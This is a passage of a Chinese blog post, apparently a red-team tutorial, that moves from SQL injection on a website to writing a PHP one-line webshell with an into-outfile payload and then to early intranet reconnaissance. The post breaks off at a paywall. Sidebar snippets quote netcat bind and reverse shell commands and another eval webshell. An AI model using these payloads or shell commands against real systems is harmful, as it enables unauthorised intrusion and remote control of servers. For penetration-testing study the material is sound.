红队攻防之从边界突破到漫游内网(无cs和msf)

最新推荐文章于 2024-08-12 17:44:09 发布
原创 最新推荐文章于 2024-08-12 17:44:09 发布 · 2k 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全 #网络安全

本文详细介绍了红队攻防过程中,如何通过SQL注入获取shell,利用内网信息收集和提权技巧逐步深入,直至拿下域控主机。涉及SQL注入、Potato提权、reGeorg内网穿透、Mimikatz等工具的使用。

前言

网络安全的本质:懂进攻,知防守,先正向,后逆向。

本篇文章目录

在这里插入图片描述

网络拓扑图:

本次红队攻防实战所需绘制的拓扑图如下:
在这里插入图片描述

边界突破

访问网站:

http://xxx.xxx.xxx/?id=1

首页如下:
在这里插入图片描述

SQL注入拿shell

构造payload:and 1=1显示正确,and 1=2显示错误,说明存在SQL注入,并且爆出绝对路径
在这里插入图片描述
使用常用的注入函数into outfile 将一句话木马写入自动创建的 xxx.php文件中

http://xxx.xxx.xxx/?id=1 and 1=2 union select 1,'<?php @eval($_REQUEST[xxx]);?>' into outfile 'x:\\xxx\\xxx\\xxx.php'

需要有写入权限和上一步爆出的绝对路径
在这里插入图片描述
验证上传的木马是否成功,成功写入木马

http://xxx.xxx.xxx/xxx.php?xxx=phpinfo();

在这里插入图片描述

成功利用蚁剑拿到shell

在这里插入图片描述

→点击获取网络安全学习资料·攻略←

2000多本网络安全系列电子书
网络安全标准题库资料
项目源码
网络安全基础入门、Linux、web安全、攻防方面的视频
网络安全学习路线图

内网信息收集

whoami
发现是普通用户的权限
在这里插入图片描述
ipconfig /all
查看用户的IP信息,可以看到位于工作组环境
在这里插入图片描述
route print
查看路由,通往10.0.1网段

最低0.47元/天 解锁文章
红队内网攻防渗透:内网渗透之内网对抗:Windows权限提升篇&溢出漏洞&宝塔面板Bypass&CS插件化&MSF模块化
HACKONE的博客
05-30 911
虚拟化:Docker,ESXi,QEMU,Hyper-V等。jsp由于机制的原因不需要提权,一般拿到的权限就是最高权限。目前的msf版本有bug可以TB上购买pro版本嘎嘎稳。集成软件:宝塔,PhpStudy,XAMMP等。ASP/ASP.NET/PHP/JSP等。全自动:快速识别系统中可能被利用的漏洞。自行搭建:自己一个个下载安装搭建配置。集成软件,自行搭建,虚拟化等。执行不了命令,所以需要提权。
【DVWA】17. File Upload 文件上传报错长段+Low+Medium)
Zichel77的博客
01-10 1537
这段代码在文件上传部分没有明确的防范措施来确保上传文件安全性。它只检查了文件是否成功移动到目标路径,并根据结果输出相应的消息。因为缺乏对上传文件的有效验证过滤机制,这可能导致安全漏洞。
中国的工作原理
无痕的博客
01-12 2721
抓包分析中国的工作原理
文件上传漏洞工具中国的安装配置以及使用
qq_38865635的博客
05-29 4476
文件上传漏洞工具中国的安装配置使用
【红蓝对抗】边界突破-思维导图
全网唯一认证 | 信息安全圈 | 知识星球 | 网安社区 | 共筑网安长城
05-30 2509
边界突破 红蓝对抗中,红方的攻击队常见的攻击思路是边界突破——>主机权限获取——>内网渗透——>获取靶机系统权限,本篇博文将利用思维导图直观介绍边界突破中可利用的几个点。 思维导图 ...
红队视角下的防御体系突破之第一篇介绍、阶段、方法
千寻的博客
07-02 1480
红队人员并不是一般意义上的电脑黑客。因为黑客往往以攻破系统,获取利益为目标;而红队则是,提升为目标。此外,对于一般的黑客来说,只要发现某一种攻击方法可以有效地达成目标,通常就没有必要再去尝试其他的攻击方法途径;但红队的目标则是要尽可能地,因此往往会穷尽已知的“所有”方法来完成攻击。换句话说,红队人员需要的是全面的攻防能力,而不仅仅是一两招很牛的黑客技术。还有一点必须说明:虽然实战攻防演习过程中通常不会严格限定红队的攻击手法,但所有技术的使用,目标的达成,也必须严格遵守国家相关的法律法规。掌握了目标企业相
精选资源
红队攻防手册,红队攻防教程
04-20
红队攻防教程是指针对网络系统安全的实践性培训,旨在模拟真实的攻击场景并提供相关的防御技术。红队是一个模拟攻击团队,通过模拟真实的黑客攻击来测试组织的安全性,而蓝队则是负责防御应对这些攻击的团队。 ...
实战攻防红队视角下的防御体系突破.docx
08-23
实战攻防红队视角下的防御体系突破
精选资源
红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&入口差异&切换上线&IPC管道&AT&SC任务&Impacket套件&UI插件
06-22
本文将深入探讨“红队内网攻防渗透”,重点介绍内网对抗中的横向移动策略、不同入口差异、上线切换技巧,以及利用IPC管道、AT任务、SC服务、Impacket工具套件UI插件等技术手段。 首先,横向移动是内网渗透的关键...
内网渗透的边界场景分析+内网代理整理
a167817的博客
03-22 786
先从nc开始理解正向代理反向代理: 1、正向连接 受害者主机执行 nc -e -t /bin/bash -lvp 7777 攻击者执行 nc -t 192.168.16.X 7777 2、反向连接 受害者主机执行 nc -t -e cmd.exe 192.168.16.104 7777 攻击者主机执行 nc -lvp...
linux环境下的"蚂"-wget使用简介
hem的专栏
06-05 1705
 linux环境下的"蚂"-wget使用简介技巧管理员(2000-12-23 09:41)〖返回〗〖转发〗wget的使用形式是:wget [参数列表] URL首先来介绍一下wget的主要参数:· -b:让wget在后台运行,记录文件写在当前目录下"wget-log"文件中;· -t [nuber of times]:尝试次数,当wget无法与服务器建立连接时,尝试连接
上传文件时遇到的服务器报错:文件上传超时的问题
最新发布
weixin_43604220的博客
08-12 2360
超时文件求被服务器拦截抛出异常。如:IIS报错502.3---超时,nginx---413 求体过的解决方法;对于ASP.NET程序IIS的超时配置。
文件上传之负载均衡踩坑记
weixin_50464560的博客
09-30 1023
事情是这样的,最近有个渗透的小伙伴找我,它通过shiro反序列化植入内存马获取了一个shell,但这台主机上有负载均衡,所以通过冰蝎、等连接工具上传文件上传失败,需要我这边提供解决方案。 问题分析 问题一:为什么shell管理工具文件上传需要分包? 我使用做了测试,配置shell可以在其他设置中设置分片的小,默认是500kb,那有小伙伴可能要说了,那我将这个值改成一个比较的值不就可以一次性上传文件也就相当于解决了负载均衡的问题。 理论上是没错的,我们...
中国 代码解压出错:【object Object】解决方法
Gjqhs的博客
01-14 1890
图样: 解决方法: 本以为是防护设置,毕竟黑客工具,后来发现只是权限不足而已 随便扔一个空文件夹,还是不行就下载自行源码吧 CSDN官方收录 成功: 再次打开:
中国+burpsuite+webshell文件上传(超完整)
qq_50953689的博客
05-14 3579
之前:需要打开phpstudy的靶场环境 第一步 ➊准备木马文件 新建木马文件ttx.php,文件内容为 <?php @eval($_REQUEST["shell"]); ?> ➋保存后,将文件后缀名php改为jpg ➌登录dvwa测试环境,将security等级改为‘low’(其它模式,后端也做了校验,无法完成第⑤步的操作),然后打开文件上传模块 ➍上传文件,选择第②步保存的shell.jpg,在点击‘Upload’之前,打开burpsuite拦截功能并且点击‘Upl
一直报错怎么办(适合从未链接成功的人观看)
m0_63745032的博客
10-04 1504
各种报错除了其他人说的,还有一个被他们忽略掉的问题,那就是win系统下安全中心,在每次把加载器解压出来的时候,win安全中心都会进行拦截并自动隔离,这个时候你需要点开,允许执行此操作,反复删除解压几次,一定要记得每次都允许执行,然后再次打开应该就没什么问题了。3.然后打开AntSword-Loader-v4.0.3-win32-x64里面的exe文件,这个时候会提示你让你选个文件夹初始化,选择文件夹到antSword-master这个文件夹下即可。作为刚开始接触的新人,一直各种报错怎么办?
网安入门10-文件上传(中国
m0_61499194的博客
01-07 1300
文件上传漏洞是一种常见的安全漏洞,它出现在Web应用程序中,允许攻击者上传恶意文件到服务器。这种漏洞可能导致严重的安全问题,例如服务器被入侵、数据泄露应用程序功能受损。文件上传漏洞通常由以下几个原因导致:不充分的文件类型验证:Web应用程序应该仅允许用户上传特定类型的文件,例如图片、文档等。如果验证不严格,攻击者可能会上传恶意文件,如脚本或可执行文件。不安全文件名处理:攻击者可能会尝试使用特殊字符或路径遍历技术来上传文件到非预期的目录。这可能导致对服务器上其他文件的访问或覆盖。
文件上传漏洞
m0_73452266的博客
06-27 656
文件上传漏洞的原理,木马的知识,前端,后端服务器配置漏洞的文件上传绕过
安装使用教程(附:上传漏洞示例)
热门推荐
li963820454的博客
04-06 2万+
简单安装使用教程(附带示例)
网络攻防演习:红队视角下的防御体系挑战与突破
"这篇文档是奇安信安服团队关于红队...总结来说,"实战攻防红队视角下的防御体系突破"是一个深度解析网络攻防动态提升安全能力的过程,对于政企机构来说,积极参与并从中学习,有助于构建更为坚固的网络安全防线。
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值